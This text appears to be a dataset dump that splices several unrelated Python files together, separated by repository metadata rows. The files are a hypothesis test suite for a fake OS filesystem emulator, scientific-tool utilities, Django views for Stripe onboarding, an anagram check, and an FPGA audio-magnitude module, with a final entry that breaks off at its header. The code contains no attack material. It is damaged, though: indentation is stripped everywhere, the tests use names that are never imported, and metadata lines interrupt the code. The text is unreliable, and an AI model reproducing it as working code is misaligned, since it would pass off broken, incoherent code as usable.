from fakeos import FakeOS
from hypothesis import given, assume, example
from hypothesis.strategies import text, sets, integers, lists, just
from filesystem import FakeDirectory, FakeFile, FakeFilesystem, \
FakeFilesystemWithPermissions
from fakeuser import FakeUser, Root
from unittest import TestCase
from operating_system import FakeWindows, FakeUnix
ILLEGAL_NAMES = ("", ".", "..")
class DirectoryCase(TestCase):
@given(text())
def test_mkdir_when_directory_already_exists(self, directory: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
with self.assertRaises(FileExistsError):
os.mkdir("/" + directory)
@given(text())
def test_mkdir_when_parent_directory_doesnt_exist(self, directory: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
with self.assertRaises(FileNotFoundError):
os.mkdir("/hello/" + directory)
@given(text(), text())
def test_mkdir_and_directory_exists_afterwards(self, directory: str, _file: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in _file and _file not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
os.mkdir("/" + directory + "/" + _file)
assert os.filesystem.has(Path("/" + directory + "/" + _file))
@given(text())
def test_mkdir_works(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
@given(text())
def test_creating_root_directory(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(directory)
assert os.filesystem.has_directory(Path(directory))
@given(text(), sets(text()))
@example("0", set())
def test_listdir_with_subdirectories_only(self, directory, subdirectories):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
for subdirectory in subdirectories:
assume(subdirectory not in ILLEGAL_NAMES)
assume("/" not in subdirectory)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
for subdirectory in subdirectories:
os.mkdir("/" + directory + "/" + subdirectory)
assert sorted(subdirectories) == sorted(os.listdir("/" + directory))
@given(text())
def test_listdir_empty_directory(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
assert os.listdir("/" + directory) == []
@given(text(), text())
def test_listdir_with_a_file_inside(self, directory, filename):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in filename and filename not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))],
files=[FakeFile(Path("/" +
directory +
"/" +
filename))]
))
os.mkdir("/" + directory)
assert os.listdir("/" + directory) == [filename]
@given(text(), text(), text())
def test_listdir_with_a_file_and_a_directory_inside(self, directory,
filename, subdirectory):
assume(subdirectory != filename)
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in filename and filename not in ILLEGAL_NAMES)
assume("/" not in subdirectory and subdirectory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))],
files=[FakeFile(Path("/" +
directory +
"/" +
filename))]
))
os.mkdir("/" + directory)
os.mkdir("/" + directory + "/" + subdirectory)
assert sorted(os.listdir("/" + directory)) == sorted([filename, subdirectory])
@given(text())
def test_makedirs_one_file_path(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path(path))]))
with self.assertRaises(OSError):
os.makedirs(path)
try:
os.makedirs(path, exist_ok=True)
except OSError:
self.fail()
@given(text())
@example("/")
@example("/0")
def test_makedirs_multiple_file_path(self, path: str):
assume("/" in path and not path.startswith("."))
os = FakeOS()
os.makedirs(path)
with self.assertRaises(OSError):
os.makedirs(path)
@given(text())
def test_makedirs_when_part_of_the_path_exists_as_and_is_a_file(self, path: str):
assume("/" in path)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
dirname = Path(path).joinpath("dirname")
with self.assertRaises(FileExistsError):
os.makedirs(dirname)
@given(text())
@example("0")
def test_rmdir(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
fullpath = "/" + path
os.makedirs(fullpath)
assert path in os.listdir("/")
os.rmdir(fullpath)
assert path not in os.listdir("/")
with self.assertRaises(FileNotFoundError):
os.rmdir(fullpath)
os.makedirs(fullpath + "/hello")
with self.assertRaises(OSError):
os.rmdir(fullpath)
os = FakeOS(filesystem=FakeFilesystemWithPermissions(FakeFilesystem(
files=[FakeFile(Path(path))])))
with self.assertRaises(NotADirectoryError):
os.rmdir(path)
class ChownCase(TestCase):
@given(text(), integers(), integers())
def test_chown_to_a_directory(self, path: str, uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chown(path, uid=uid, gid=gid)
assert os.filesystem[path].uid == uid
assert os.filesystem[path].gid == gid
@given(text(), integers(), integers())
def test_chown_to_a_file(self, path: str, uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
os.chown(path, gid=gid, uid=uid)
assert os.filesystem[path].uid == uid
assert os.filesystem[path].gid == gid
@given(text(), integers(), integers())
def test_chown_to_a_nonexisting_fileobject(self, path: str, uid: int,
gid: int):
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.chown(path, gid=gid, uid=uid)
@given(text(), integers(), integers())
def test_chown_not_changing_already_set_attributes(self, path: str,
uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chown(path, uid=uid, gid=gid)
os.chown(path, uid=-1, gid=-1)
assert os.filesystem[path].gid == gid
assert os.filesystem[path].uid == uid
class ChmodCase(TestCase):
@given(text(), integers())
def test_chmod(self, path, mode):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chmod(path, mode)
assert os.filesystem[path].mode == mode
class FileCase(TestCase):
@given(text())
@example("0")
def test_remove_a_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystemWithPermissions(FakeFilesystem(
files=[FakeFile(Path("hello/" + path))])))
os.mkdir("hello")
assert os.listdir("hello") == [path]
os.remove("hello/" + path)
assert os.listdir("hello") == []
@given(text())
def test_remove_a_directory(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
with self.assertRaises(IsADirectoryError):
os.remove(path)
@given(text())
def test_remove_a_non_existent_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.remove(path)
class CurrentDirectoryCase(TestCase):
@given(text())
def test_chdir(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chdir(path)
assert os.getcwd() == str(Path(path).absolute())
@given(text())
def test_chdir_directory_does_not_exist(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.chdir(path)
@given(text())
def test_chdir_directory_path_is_a_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
with self.assertRaises(NotADirectoryError):
os.chdir(path)
class DeviceCase(TestCase):
@given(integers(), integers())
def test_makedev(self, major, minor):
assume(-1 < major < 2 ** 31 and -1 < minor < 2 ** 31)
os = FakeOS()
assert os.makedev(major, minor) == _os.makedev(major, minor)
@given(integers())
def test_major(self, device):
assume(-1 < device < 2 ** 64)
os = FakeOS()
assert os.major(device) == _os.major(device)
@given(integers())
def test_minor(self, device):
assume(-1 < device < 2 ** 64)
os = FakeOS()
assert os.minor(device) == _os.minor(device)
class RenameCase(TestCase):
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_root_directory(self, old, new):
assume(old != new)
os = FakeOS()
os.mkdir(old)
os.rename(old, new)
with self.assertRaises(FileNotFoundError):
old_file = os.filesystem[Path(old)]
try:
new_file = os.filesystem[Path(new)]
except FileNotFoundError:
self.fail("Filke was not renamed.")
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_non_root_directory(self, root, old, new):
os = FakeOS()
os.mkdir(root)
os.mkdir(root + "/" + old)
os.rename(root + "/" + old, root + "/" + new)
assert os.listdir(root) == [new]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_root_non_leaf_folder(self, old, new, inside):
os = FakeOS()
os.mkdir(old)
os.mkdir(old + "/" + inside)
os.rename(old, new)
assert os.listdir(new) == [inside]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_non_root_non_leaf_folder(self, old, new, inside, root):
os = FakeOS()
os.makedirs(root + "/" + old + "/" + inside)
os.rename(root + "/" + old, root + "/" + new)
assert os.listdir(root + "/" + new) == [inside]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_when_destination_exists_on_windows(self, old, new):
assume(old != new)
os = FakeOS(operating_system=FakeWindows())
os.mkdir(old)
os.mkdir(new)
with self.assertRaises(OSError):
os.rename(old, new)
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_when_destination_exists_on_unix(self, old, new, somefile):
assume(old != new)
os = FakeOS(operating_system=FakeUnix(),
filesystem=FakeFilesystem(files=[FakeFile(Path(old)),
FakeFile(Path(new))],
operating_system=FakeUnix()))
os.rename(old, new)
os.filesystem[Path(new)]
with self.assertRaises(OSError):
fileobject = os.filesystem[Path(old)]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_a_folder_and_changing_its_hierarchy(self, a, b, c, d, e):
assume(e != b)
os = FakeOS()
os.makedirs(a + "/" + b + "/" + c + "/" + d)
os.rename(a + "/" + b + "/" + c, a + "/" + e)
assert set(os.listdir(a)) == {b, e}
assert os.listdir(a + "/" + e) == [d]
@given(text(alphabet=ascii_letters, min_size=1))
def test_renaming_to_the_same_thing(self, path):
os = FakeOS()
os.mkdir(path)
os.rename(path, path)
class AccessCase(TestCase):
def test_access_when_root(self):
os = FakeOS(user=Root())
os.mkdir("/", mode=0o000)
for access_modifier in (os.X_OK, os.W_OK, os.R_OK, os.F_OK):
assert os.access("/", access_modifier)
def test_access_exist(self):
os = FakeOS()
os.mkdir("/")
assert os.access("/", os.F_OK) and not os.access("other", os.F_OK)
def test_access_effective_ids(self):
os = FakeOS(user=FakeUser(gid=-2, uid=-2, is_sudoer=False))
os.setgid(0)
os.setuid(0)
assert os.getgid() == 0
assert os.getuid() == 0
os.mkdir("/", mode=0o070) # Group only
os.setgid(-7)
os.setuid(-7)
os.seteuid(0)
os.setegid(0)
assert not os.access("/", mode=os.R_OK)
assert os.access("/", mode=os.R_OK, effective_ids=True)
def test_access_when_owner(self):
os = FakeOS(user=FakeUser(gid=14, uid=42))
os.mkdir("r", mode=0o400)
os.mkdir("w", mode=0o200)
os.mkdir("x", mode=0o100)
os.mkdir("rw", mode=0o600)
os.mkdir("wx", mode=0o300)
os.mkdir("rx", mode=0o500)
os.mkdir("rwx", mode=0o700)
os.filesystem.set_user(FakeUser(gid=18, uid=42))
assert os.access("r", os.R_OK)
assert not os.access("r", os.W_OK)
assert not os.access("r", os.X_OK)
assert os.access("w", os.W_OK)
assert not os.access("w", os.R_OK)
assert not os.access("w", os.X_OK)
assert os.access("x", os.X_OK)
assert not os.access("x", os.R_OK)
assert not os.access("x", os.W_OK)
assert os.access("rw", os.R_OK)
assert os.access("rw", os.W_OK)
assert os.access("rw", os.R_OK | os.W_OK)
assert not os.access("rw", os.X_OK)
assert not os.access("rw", os.X_OK | os.W_OK)
assert os.access("wx", os.X_OK)
assert os.access("wx", os.W_OK)
assert os.access("wx", os.X_OK | os.W_OK)
assert not os.access("wx", os.R_OK)
assert not os.access("wx", os.X_OK | os.R_OK)
assert os.access("rx", os.X_OK)
assert os.access("rx", os.R_OK)
assert os.access("rx", os.X_OK | os.R_OK)
assert not os.access("rx", os.W_OK)
assert not os.access("rx", os.W_OK | os.R_OK)
assert os.access("rwx", os.R_OK)
assert os.access("rwx", os.X_OK)
assert os.access("rwx", os.F_OK)
assert os.access("rwx", os.R_OK | os.X_OK | os.W_OK)
assert os.access("rwx", os.X_OK | os.W_OK)
def test_access_when_everyone(self):
os = FakeOS(user=FakeUser(gid=-1, uid=-1))
os.mkdir("r", mode=0o004)
os.mkdir("w", mode=0o002)
os.mkdir("x", mode=0o001)
os.mkdir("rw", mode=0o006)
os.mkdir("wx", mode=0o003)
os.mkdir("rx", mode=0o005)
os.mkdir("rwx", mode=0o007)
os.filesystem.set_user(FakeUser(gid=0, uid=0))
assert os.access("r", os.R_OK)
assert not os.access("r", os.W_OK)
assert not os.access("r", os.X_OK)
assert os.access("w", os.W_OK)
assert not os.access("w", os.R_OK)
assert not os.access("w", os.X_OK)
assert os.access("x", os.X_OK)
assert not os.access("x", os.R_OK)
assert not os.access("x", os.W_OK)
assert os.access("rw", os.R_OK)
assert os.access("rw", os.W_OK)
assert os.access("rw", os.R_OK | os.W_OK)
assert not os.access("rw", os.X_OK)
assert not os.access("rw", os.X_OK | os.W_OK)
assert os.access("wx", os.X_OK)
assert os.access("wx", os.W_OK)
assert os.access("wx", os.X_OK | os.W_OK)
assert not os.access("wx", os.R_OK)
assert not os.access("wx", os.X_OK | os.R_OK)
assert os.access("rx", os.X_OK)
assert os.access("rx", os.R_OK)
assert os.access("rx", os.X_OK | os.R_OK)
assert not os.access("rx", os.W_OK)
assert not os.access("rx", os.W_OK | os.R_OK)
assert os.access("rwx", os.R_OK)
assert os.access("rwx", os.X_OK)
assert os.access("rwx", os.F_OK)
assert os.access("rwx", os.R_OK | os.X_OK | os.W_OK)
assert os.access("rwx", os.X_OK | os.W_OK)
def test_access_when_group(self):
os = FakeOS(user=FakeUser(gid=14, uid=42))
os.mkdir("r", mode=0o040)
os.mkdir("w", mode=0o020)
os.mkdir("x", mode=0o010)
os.mkdir("rw", mode=0o060)
os.mkdir("wx", mode=0o030)
os.mkdir("rx", mode=0o050)
os.mkdir("rwx", mode=0o070)
os.filesystem.set_user(FakeUser(gid=14, uid=56))
assert os.access("r", os.R_OK)
assert not os.access("r", os.W_OK)
assert not os.access("r", os.X_OK)
assert os.access("w", os.W_OK)
assert not os.access("w", os.R_OK)
assert not os.access("w", os.X_OK)
assert os.access("x", os.X_OK)
assert not os.access("x", os.R_OK)
assert not os.access("x", os.W_OK)
assert os.access("rw", os.R_OK)
assert os.access("rw", os.W_OK)
assert os.access("rw", os.R_OK | os.W_OK)
assert not os.access("rw", os.X_OK)
assert not os.access("rw", os.X_OK | os.W_OK)
assert os.access("wx", os.X_OK)
assert os.access("wx", os.W_OK)
assert os.access("wx", os.X_OK | os.W_OK)
assert not os.access("wx", os.R_OK)
assert not os.access("wx", os.X_OK | os.R_OK)
assert os.access("rx", os.X_OK)
assert os.access("rx", os.R_OK)
assert os.access("rx", os.X_OK | os.R_OK)
assert not os.access("rx", os.W_OK)
assert not os.access("rx", os.W_OK | os.R_OK)
assert os.access("rwx", os.R_OK)
assert os.access("rwx", os.X_OK)
assert os.access("rwx", os.F_OK)
assert os.access("rwx", os.R_OK | os.X_OK | os.W_OK)
assert os.access("rwx", os.X_OK | os.W_OK)
class PermissionsCase(TestCase):
def test_rmdir_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(uid=0, gid=0))
os.mkdir("/", mode=0)
with self.assertRaises(PermissionError):
os.rmdir("/")
def test_renaming_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser())
os.mkdir("/", mode=0o000)
with self.assertRaises(PermissionError):
os.rename("/", "lol")
def test_chmod_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(gid=2, uid=2, is_sudoer=False))
os.mkdir("/", mode=0o100)
with self.assertRaises(PermissionError):
os.chmod("/", mode=0o666)
def test_chown_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(gid=2, uid=2, is_sudoer=False))
os.mkdir("/", mode=0)
with self.assertRaises(PermissionError):
os.chown('/', uid=3)
def test_mkdir_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(gid=2, uid=2, is_sudoer=False))
os.mkdir("/", mode=0)
with self.assertRaises(PermissionError):
os.mkdir("/hello")
def test_listdir_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(gid=2, uid=2, is_sudoer=False))
os.mkdir("/", mode=0o666) # No execution allowed
with self.assertRaises(PermissionError):
os.listdir("/")
class UserAndGroupCase(TestCase):
@given(integers())
def test_gid(self, gid: int):
os = FakeOS()
os.setgid(gid)
assert os.getgid() == gid
@given(integers())
def test_uid(self, uid: int):
os = FakeOS()
os.setuid(uid)
assert os.getuid() == uid
@given(integers())
def test_egid(self, egid: int):
os = FakeOS()
os.setegid(egid)
assert os.getegid() == egid
@given(integers())
def test_euid(self, euid: int):
os = FakeOS()
os.seteuid(euid)
assert os.geteuid() == euid
| 33.403818
| 86
| 0.583656
| 22,162
| 0.974239
| 0
| 0
| 14,293
| 0.628319
| 0
| 0
| 874
| 0.038421
|
9fe6a6466ba62d142e4c8d8e39066315eacdcdb4
| 6,129
|
py
|
Python
|
ceed/utils.py
|
matham/ceed
|
5d32a99a33325b36dbe74d8b0a22e63abc92aab7
|
[
"MIT"
] | 1
|
2020-03-02T22:26:44.000Z
|
2020-03-02T22:26:44.000Z
|
ceed/utils.py
|
matham/ceed
|
5d32a99a33325b36dbe74d8b0a22e63abc92aab7
|
[
"MIT"
] | null | null | null |
ceed/utils.py
|
matham/ceed
|
5d32a99a33325b36dbe74d8b0a22e63abc92aab7
|
[
"MIT"
] | 2
|
2020-01-13T19:42:16.000Z
|
2020-01-27T14:58:09.000Z
|
"""Utilities
===================
Various tools used in :mod:`ceed`.
"""
import re
import pathlib
from collections import deque
from typing import List, Tuple, Any, Union
__all__ = (
'fix_name', 'update_key_if_other_key', 'collapse_list_to_counts',
'get_plugin_modules', 'CeedWithID',
)
_name_pat = re.compile('^(.+)-([0-9]+)$')
def fix_name(name, *names):
"""Fixes the name so that it is unique among the names in ``names``.
:Params:
`name`: str
A name of something
`*names`: iterables of strings
Positional argument, where each is a iterable of strings among
which we ensure that the returned name is unique.
:returns:
A string that is unique among all the ``names``, but is similar to
``name``. We append a integer to make it unique.
E.g.::
>>> fix_name('troll', ['toll', 'foll'], ['bole', 'cole'])
'troll'
>>> fix_name('troll', ['troll', 'toll', 'foll'], ['bole', 'cole'])
'troll-2'
>>> fix_name('troll', ['troll-2', 'toll', 'foll'], ['bole', 'cole'])
'troll'
>>> fix_name('troll', ['troll', 'troll-2', 'toll', 'foll'], \
['bole', 'cole'])
'troll-3'
"""
if not any((name in n for n in names)):
return name
m = re.match(_name_pat, name)
i = 2
if m is not None:
name, i = m.groups()
i = int(i)
new_name = '{}-{}'.format(name, i)
while any((new_name in n for n in names)):
i += 1
new_name = '{}-{}'.format(name, i)
return new_name
def update_key_if_other_key(items, key, value, other_key, key_map):
"""Given a dict, or list/tuple of dicts (recursively), it goes through all
the dicts and updates the keys who match.
Specifically, if a key matches ``key``, its value matches ``value``,
there's another key named ``other_key`` in the dict, and the ``value`` of
``other_key`` is in ``key_map``, then the value of ``other_key`` is
updated to that value from ``key_map``.
"""
for item in items:
if isinstance(item, dict):
if key in item and item[key] == value and other_key in item:
item[other_key] = key_map.get(item[other_key], item[other_key])
update_key_if_other_key(
item.values(), key, value, other_key, key_map)
elif isinstance(item, (list, tuple)):
update_key_if_other_key(item, key, value, other_key, key_map)
def collapse_list_to_counts(values: list) -> List[Tuple[Any, int]]:
"""Converts a sequence of items to tuples of the item and count of
sequential items.
E.g.::
>>> collapse_list_to_counts([1, 1, 2, 3, 1, 1, 1, 3,])
[(1, 2), (2, 1), (3, 1), (1, 3), (3, 1)]
"""
counter = None
last_item = object()
res = []
for value in values:
if value != last_item:
if counter is not None:
res.append((last_item, counter))
last_item = value
counter = 1
else:
counter += 1
if counter is not None:
# we saw some items at least, the last was not added
res.append((last_item, counter))
return res
def get_plugin_modules(
base_package: str, root: Union[str, pathlib.Path]
) -> Tuple[List[str], List[Tuple[Tuple[str], bytes]]]:
"""Takes a package name and it's corresponding root path and returns a list
of the modules recursively within this package, as well as the source files
in bytes.
Only ``*.py`` files are considered, and although included with the source
bytes, the ``packages`` list skips any files that start with a underscore
(except ``__init__.py`` of course).
"""
packages = []
files = []
fifo = deque([pathlib.Path(root)])
while fifo:
directory = fifo.popleft()
relative_dir = directory.relative_to(root)
directory_mod = '.'.join((base_package,) + relative_dir.parts)
for item in directory.iterdir():
if item.is_dir():
if not item.name == '__pycache__':
fifo.append(item)
continue
if not item.is_file() or not item.name.endswith(('.py', '.pyo')):
continue
# only pick one of pyo/py
if item.suffix == '.pyo' and item.with_suffix('.py').exists():
continue
files.append(
(relative_dir.parts + (item.name, ), item.read_bytes()))
if item.name.startswith('_') and item.name != '__init__.py' \
and item.name != '__init__.pyo':
continue
name = item.name[:-3]
if name == '__init__':
package = directory_mod
else:
package = f'{directory_mod}.{name}'
packages.append(package)
return packages, files
class CeedWithID:
"""Adds :attr:`ceed_id` to the class so that any inheriting class instance
can be associated with a unique integer ID for logging purposes.
The ID is not automatically set for every object, it is manually set
when :meth:`set_ceed_id` is called. See stage/function for when it's called.
"""
ceed_id: int = 0
"""The integer id of the object.
"""
def set_ceed_id(self, min_available: int) -> int:
"""Sets the ID of this and any sub objects, each to a number equal or
greater than ``min_available`` and returns the next minimum number
available to be used.
See :attr:`~ceed.analysis.CeedDataReader.event_data` for more details.
:param min_available: The minimum number available to be used for the
ID so it is unique.
:return: The next minimum available number that can be used. Any number
larger or equal to it is free to be used.
"""
self.ceed_id = min_available
return min_available + 1
| 32.775401
| 81
| 0.565019
| 1,065
| 0.173764
| 0
| 0
| 0
| 0
| 0
| 0
| 3,146
| 0.513297
|
9fe8653449fbc6e6fa94b10d1d0a857bd0455ebf
| 2,341
|
py
|
Python
|
gumroad_clone/users/views.py
|
AlexanderTCHK/gumroad-clone
|
39654243e581b918569772e410196557f71f6591
|
[
"MIT"
] | 1
|
2022-01-22T13:43:30.000Z
|
2022-01-22T13:43:30.000Z
|
gumroad_clone/users/views.py
|
AlexanderTCHK/gumroad-clone
|
39654243e581b918569772e410196557f71f6591
|
[
"MIT"
] | null | null | null |
gumroad_clone/users/views.py
|
AlexanderTCHK/gumroad-clone
|
39654243e581b918569772e410196557f71f6591
|
[
"MIT"
] | null | null | null |
import stripe
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from django.views.generic import DetailView, RedirectView, UpdateView, TemplateView
from stripe.api_resources import account_link
User = get_user_model()
stripe.api_key = settings.STRIPE_SECRET_KEY
class UserProfileView(LoginRequiredMixin, TemplateView):
template_name = 'profile.html'
def get_context_data(self, **kwargs):
account = stripe.Account.retrieve(self.request.user.stripe_account_id)
details_submitted = account["details_submitted"]
contex = super().get_context_data(**kwargs)
contex.update({
'details_submitted': details_submitted
})
return contex
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
user_detail_view = UserDetailView.as_view()
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = User
fields = ["name"]
success_message = _("Information successfully updated")
def get_success_url(self):
assert (
self.request.user.is_authenticated
) # for mypy to know that the user is authenticated
return self.request.user.get_absolute_url()
def get_object(self):
return self.request.user
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("discover")
user_redirect_view = UserRedirectView.as_view()
class StripeAccountLink(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
# Domain for success and cancel urls
domain = "http://" + settings.ALLOWED_HOSTS[0]
account_link = stripe.AccountLink.create(
account = self.request.user.stripe_account_id,
refresh_url = domain + reverse("stripe-account-link"),
return_url = domain + reverse("profile"),
type = "account_onboarding",
)
return account_link["url"]
| 29.2625
| 83
| 0.720632
| 1,683
| 0.718924
| 0
| 0
| 0
| 0
| 0
| 0
| 271
| 0.115762
|
9fe92dc5882b9ab766bfa49539001ca33aa51f84
| 510
|
py
|
Python
|
chapter1/quest1_4.py
|
mag6367/Coding_the_Coding_Interview_Python_Solutions
|
1d97d18d3d9732c25626e20cb3561ce4241b16e8
|
[
"MIT"
] | 1
|
2017-04-28T13:52:13.000Z
|
2017-04-28T13:52:13.000Z
|
chapter1/quest1_4.py
|
mag6367/Cracking_the_Coding_Interview_Python_Solutions
|
1d97d18d3d9732c25626e20cb3561ce4241b16e8
|
[
"MIT"
] | null | null | null |
chapter1/quest1_4.py
|
mag6367/Cracking_the_Coding_Interview_Python_Solutions
|
1d97d18d3d9732c25626e20cb3561ce4241b16e8
|
[
"MIT"
] | null | null | null |
# question 1.4 from cracking the code interview 4th ed.
'''
Write a method to decide if two strings are anagrams or not.
'''
# if we sort the two string, they should be the same
def areAnagram (str1, str2):
# check is strings are valid
if not isinstance(str1, str) or not isinstance(str2, str):
return False
# first we convert the two strings into lists and sort them
newStr1 = sorted(str1)
newStr2 = sorted(str2)
# if they are anagrams, the lists should be identical
return newStr1 == newStr2
| 24.285714
| 60
| 0.727451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 315
| 0.617647
|
9febad62a52cd187ba14dbd7516dbb4c9c77a4fc
| 2,516
|
py
|
Python
|
firmware/measure_magnitude.py
|
mfkiwl/OpenXcvr
|
9bea6efd03cd246f16982f0fadafed684ac5ce1c
|
[
"MIT"
] | 14
|
2020-02-16T15:36:31.000Z
|
2022-03-27T02:24:40.000Z
|
firmware/measure_magnitude.py
|
mfkiwl/OpenXcvr
|
9bea6efd03cd246f16982f0fadafed684ac5ce1c
|
[
"MIT"
] | 1
|
2020-11-23T16:16:33.000Z
|
2020-11-23T16:16:33.000Z
|
firmware/measure_magnitude.py
|
mfkiwl/OpenXcvr
|
9bea6efd03cd246f16982f0fadafed684ac5ce1c
|
[
"MIT"
] | 4
|
2021-03-29T16:55:03.000Z
|
2022-01-23T16:43:59.000Z
|
from baremetal import *
from baremetal.signed import number_of_bits_needed
from settings import Settings
from math import log, pi
from matplotlib import pyplot as plt
import numpy as np
import sys
from math import log, ceil
from numpy import log10
#settings for 100KS/s
# hang attack decay
# fast 10000(100ms) 4(1ms) 10(62.5ms)
# med 25000(250ms) 4(1ms) 12(250ms)
# slow 100000(1s) 4(1ms) 13(500ms)
# long 200000(2s) 4(1ms) 15(2s)
def measure_magnitude(clk, audio, audio_stb, agc_speed, reset=0):
attack_factor = 4
max_factor = 15
decay_factor = Signed(5).select(agc_speed, 9, 11, 12, 13)
hang = Unsigned(19).select(agc_speed, 5000, 12500, 50000, 100000)
#use a leaky max hold
audio_bits = audio.subtype.bits
#add extra bits for decay calculation
audio = audio.resize(audio_bits+max_factor) << max_factor
max_hold = audio.subtype.register(clk, init=0, en=audio_stb)
counter = Unsigned(19).register(clk, en=audio_stb, init=0)
#if signal is greater than magnitude
attack = (audio > max_hold)
attack_new_val = max_hold + ((audio - max_hold) >> attack_factor)
decay_new_val = max_hold - (max_hold >> decay_factor)
hold_expired = counter == 0
counter.d(counter.subtype.select(attack, counter.subtype.select(hold_expired, counter - 1, 0), hang-1))
max_hold_new_val = audio.subtype.select(attack, max_hold.subtype.select(hold_expired, max_hold, decay_new_val), attack_new_val)
max_hold.d(audio.subtype.select(reset, max_hold_new_val, 0))
#remove extra bits (except one to allow for addition)
max_hold = (max_hold >> max_factor).resize(audio_bits)
return max_hold
if __name__ == "__main__" and "sim" in sys.argv:
settings = Settings()
settings.agc_frame_size = 100
settings.agc_frames = 4
clk = Clock("clk")
data_in = Signed(16).input("data_in")
stb_in = Boolean().input("stb_in")
magnitude = measure_magnitude(clk, data_in, stb_in, 0, 0)
stimulus = []
for i in range(1000):
stimulus.append(100)
for i in range(20000):
stimulus.append(0)
response = []
#simulate
clk.initialise()
i = 0
for data in stimulus:
data_in.set(data)
for i in range(2):
stb_in.set(i==1)
if i==1:
response.append(magnitude.get())
clk.tick()
i+=1
response = np.array(response)
plt.plot(response)
plt.plot(stimulus)
plt.show()
| 30.313253
| 131
| 0.65779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 423
| 0.168124
|
9fec2b87298b7ce1d8fa49d924c18e361c3fbd3b
| 737
|
py
|
Python
|
chpt6/Palindrome.py
|
GDG-Buea/learn-python
|
9dfe8caa4b57489cf4249bf7e64856062a0b93c2
|
[
"Apache-2.0"
] | null | null | null |
chpt6/Palindrome.py
|
GDG-Buea/learn-python
|
9dfe8caa4b57489cf4249bf7e64856062a0b93c2
|
[
"Apache-2.0"
] | 2
|
2018-05-21T09:39:00.000Z
|
